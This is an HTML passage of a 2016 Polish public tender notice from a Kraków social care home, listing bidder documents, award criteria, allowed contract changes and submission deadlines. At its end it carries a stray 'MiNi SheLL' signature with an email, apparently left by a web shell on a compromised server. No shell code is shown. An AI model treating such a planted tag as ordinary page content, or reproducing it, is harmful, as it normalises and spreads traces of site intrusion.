W razie konieczności Wykonawca zapewni również udział w realizacji zamówienia osoby z innymi uprawnieniami - jeżeli będzie to wymagane.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek o którym mowa w art. 22 ust. 1 pkt 4 zostanie uznany za spełniony, jeżeli Wykonawca złoży oświadczenie na zał. nr 1 do SIWZ-  oświadczenie o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto Wykonawca jest zobowiązany złożyć wymagane w postępowaniu dokumenty i oświadczenia, a to  :
a) wypełniony Formularz Ofertowy stanowiący Załącznik nr 6  do niniejszej SIWZ,
b) Wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Jeżeli Wykonawca, wykazując spełnienie warunków, o którym mowa w pkt II niniejszej SIWZ, polega na zasobach innych podmiotów, zobowiązany jest wykazać, że w stosunku do tych podmiotów brak jest podstaw do wykluczenia z postępowania o udzielenie zamówienia, poprzez złożenie razem z ofertą dokumentów wymienionych w pkt. III SIWZ dotyczących każdego z tych podmiotów, o ile podmioty te będą brały udział w realizacji części zamówienia.
lub
c)  Oświadczenie  Pełnomocnika  
 reprezentującego Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodne ze wzorem stanowiącym Załącznik nr 1a do niniejszej SIWZ. 
Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia w rozumieniu art. 23 ust. 1 ustawy. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego (np. członkowie konsorcjum) są zobowiązani ustanowić Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i do zawarcia umowy w sprawie zamówienia publicznego. 
Wszelkie pełnomocnictwa winny być załączone do oferty w formie oryginału lub urzędowo poświadczonego odpisu pełnomocnictwa (notarialnie - art. 96 ustawy z 14 lutego 1991 r. - Prawo o notariacie (tekst jednolity Dz. U. z 2014r. poz. 164 z póź. zm.).
d) Wzór umowy  ( zaparafowany ) stanowiący Załącznik nr 2  do niniejszej SIWZ.
e) wykaz wykonanych / wykonywanych usług , stanowiący Załącznik nr 4  do niniejszej SIWZ.
f) pozostałe wymagane dokumenty  potwierdzające spełnienie warunków, o których mowa  w pkt III ppkt. 1.2 oraz ppk. 1.3.  stanowiące Załącznik nr 3 i 4  do niniejszej SIWZ.
g) Oświadczenie Wykonawcy, że osoby które będą uczestniczyć w realizacji zamówienia, posiadają wymagane uprawnienia stanowiący Załącznik nr 8 do niniejszej SIWZ. 
h) Oświadczenie Wykonawcy- pozostałe warunki realizacji przedmiotu zamówienia stanowiący Załącznik nr 5 do niniejszej SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin złożenia wniosku o pozwolenie na budowę (nie krócej niż 30 i nie dłużej niż 60 dni liczonych od dnia wydania decyzji o ULICP). - 5</li>
<li>3 - Termin dostarczenia Zamaw. kompletnej dokumentacji, w tym projektu wykonawczego wraz ze specyfikacją techniczną wykonania i odbioru robót, kosz - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmianie może ulec:
1)	termin realizacji, w przypadku:
a)	opóźnień leżących po stronie Zamawiającego obejmujących akceptację rozwiązań projektowych trwających dłużej niż 7 od daty dostarczenia koncepcji architektonicznej oraz dostarczeniu pełnomocnictwa dla Wykonawcy, oświadczenia o dysponowaniu nieruchomością na cele budowlane w terminie późniejszym niż 7 dni od daty wystąpienia Wykonawcy o dostarczenie tych dokumentów,
b)	działania siły wyższej, mającej wpływ na terminowość wykonania robót,
c)	wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności,
d)	zaistnienia konieczności udzielenia zamówień dodatkowych, o których mowa w art.67 ust.1 pkt 5 Pzp, lub zamówień uzupełniających, o których mowa  w art.67 ust. 1 pkt 6 Pzp o ile wykonanie tych zamówień wpływa na termin wykonania niniejszego zamówienia,
e)	organy dokonujące uzgodnień nie wydadzą zgód i pozwoleń w terminie dłuższym niż określono w przepisach i obowiązujących przedmiarach i publicznie dostępnych procedurach,
2)	zakres zamówienia w celu zrealizowania wszystkich elementów zamówienia gdy konieczne byłoby uwzględnienie robót i rozwiązań, które powodują znaczne podniesienie kosztów wykonania robót budowalnych, a nie przynoszą znacznych korzyści i nie są wymagane przepisami prawa,
3)	istnieją inne rozwiązania zamienne w stosunku do wskazanych przez zamawiającego, które pozwolą na uzyskanie zamierzonego efektu i nie podnoszą one kosztu realizacji zamierzenia budowlanego,
4)	zakres wskazany przez zamawiającego w specyfikacji istotnych warunków zamówienia jest niemożliwy do uzyskania z uwagi na obowiązujące przepisy, konstrukcję, powierzchnię lokali/budynków lub z uwagi na negatywne opinie organów opiniujących dokonujących uzgodnień i wydających pozwolenia,
5)	warunki i terminy płatności,
6)	podwykonawcy oraz zakresu czynności im powierzonego,
7)	zmniejszenie wysokości wynagrodzenia o ile nastąpi zmniejszenie zakresu zamówienia,
8)	zmiany osób realizujących zamówienie w stosunku do wskazanych w wykazie.
2.	Zmiana postanowień Umowy dokonana z naruszeniem powyższych postanowień jest nieważna. 
3.	Zmiany Umowy następują w formie pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dpshelclow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> DOM POMOCY SPOŁECZNEJ IM. L.A. HELCLÓW W KRAKOWIE, 31-148 KRAKÓW, UL. HELCLÓW 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.06.2016 godzina 08:30, miejsce: DOM POMOCY SPOŁECZNEJ IM. L.A. HELCLÓW W KRAKOWIE, 31-148 KRAKÓW, UL. HELCLÓW 2 - SEKRETARIAT, PARTER - POKÓJ NR 8.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com